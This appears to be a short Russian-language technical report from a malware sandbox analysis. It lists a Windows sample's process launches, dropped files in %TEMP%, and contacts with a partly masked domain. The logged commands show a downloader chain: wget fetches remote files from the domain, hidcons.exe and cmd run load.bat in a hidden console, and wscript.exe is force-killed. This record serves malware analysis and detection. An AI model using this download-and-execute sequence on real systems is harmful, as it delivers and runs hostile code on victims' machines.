Техническая информация
- '%TEMP%\wget.exe' http://ms###st.name/work.ini
- '%TEMP%\wget.exe' /
- '%TEMP%\hidcons.exe' load.bat
- '%TEMP%\wget.exe' --load-cookies cookies.txt http://ms###st.name/2.php
- '<SYSTEM32>\taskkill.exe' /F /IM "wscript.exe"
- '<SYSTEM32>\cmd.exe' /c load.bat
- %TEMP%\2.php
- %TEMP%\work.ini
- %TEMP%\load.bat
- %TEMP%\wget.exe
- %TEMP%\hidcons.exe
- %TEMP%\2.php
- %TEMP%\work.ini
- 'ms###st.name':80
- ms###st.name/work.ini
- ms###st.name/2.php
- DNS ASK ms###st.name
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'